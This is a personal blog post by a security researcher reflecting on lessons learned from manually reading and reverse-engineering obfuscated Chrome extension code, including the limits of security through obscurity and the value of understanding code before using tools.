Lessons I learned from reading thousands of lines of code

Over the past two months, my main job has been to read codebases- literally, just reading code. I wrote a post few weeks ago where I described how I downloaded 450 GB of Chrome Plugins.

Here’s a bit of background first. I work(ed), part-time, as a security researcher at the intersection of machine learning and any kind of imaginable security issues therein. The goal was to discover if any sort of client-side machine learning deployed at large could be vulnerable to potential security flaws. Imagine if your Ad Blocker plugin was taking a snapshot of your webpage to do machine learning, but instead ended up doing something shady. One good list of potential candidates was the Google Chrome extensions.

In a case where I have to analyze Chrome extensions, there was no tool that I could use. Any kind of tooling, if at all, I would have to invent myself. But before I could even think of building something that could automate such a difficult ‘meta-analyzer’ that could tell me if an extension was doing something shady just by feeding it the source code, I was better off diving deep into those extensions manually. And that is exactly what I did. I built some ‘helper’ snippets that would ease my job, but majority of the time, I just read piles of JavaScript- both ugly and beautiful, and simple to arcane.

I have written thousands of lines of code as a programmer, but solely reading code to understand and ‘reverse-engineer’ thousands of lines of codes (often, obfuscated), taught me few great lessons.

1. You can’t reverse engineer a system without fully understanding it

Or conversely, if you understand a system well-enough, you can easily reverse-engineer it. If you would rather fancy another version, then the more you understand a system, the better your odds of reverse engineering a system.

For instance, after having figured the major machinery of about five extensions (some of whom had a whopping 20k+ lines of code), the next ones almost spoke to me directly. After I had pretty much understood the majority of the structure of some of the suspected extensions, a little peek into the next ones gave it all. I should mention here that it was not only the depth, but also the breadth of my exploration that helped me in getting very good grasp of ‘things that mattered’.

At some point, it was just ‘obvious’ for me to look exactly where I should have been looking. I think you can get better at hacking a system if you expose itself enough to yourself.

2. Surely, you are hiding something, Mr. Programmer!

There is a naive approach to security called security through obscurity. I used to believe that if you write fairly obscure code, it might be difficult to uncover the logic of your code. I was wrong, and I figured it out myself that after going through the soruce code of very few plugins, I realized that even minified code was decently obvious to me.

You think you can easily hide things, and you will live under the rock that no one would ever figure things out. But alas, someone, somehwere has figured something out about you.

3. No tool is better than an un-understood tool

With a plethora of tool available for almost every problem, it is a common temptation to go for specialized tools. But if the problem that you are dealing with is so novel to you that you’ve not even comprehended the problem, it might be better for you not use a tool at all. If you still have not figured out the basics of JavaScript, picking up jQuery to learn JavaScript might not be a good idea, etc.

Sometimes, not having a tool is actually better. When you have to invent or even reinvent the tool, then you are at the epitome of fully understanding and appreciating your tool.

4. Human brain is extremely code-plastic in nature

If you are a programmer who once in a while encounters other programmers, then you must have encountered those pesky snobs who preach a certain coding style, or those who go for some stringent linting, etc. Shamelessly, I am one from the former group. But when you read codebase that is used by hundreds of thousands of people (think of a famous Chrome extension), and yet is all mess, and yet it works, you tend to soften a bit. It is almost magical, but in less than few days, I realized that I could look at very ugly code and yet admire its inner workings, its utility, its users' comments and feedback. ES5 vs ES6, tabs vs spaces, light vs node-bloated constipation, almost everything was acceptable.

And therein I learned my good lesson- if I feed my brain good style, good guidelines, and good practices, it will soon catch-up. Of course, the converse should apply as well.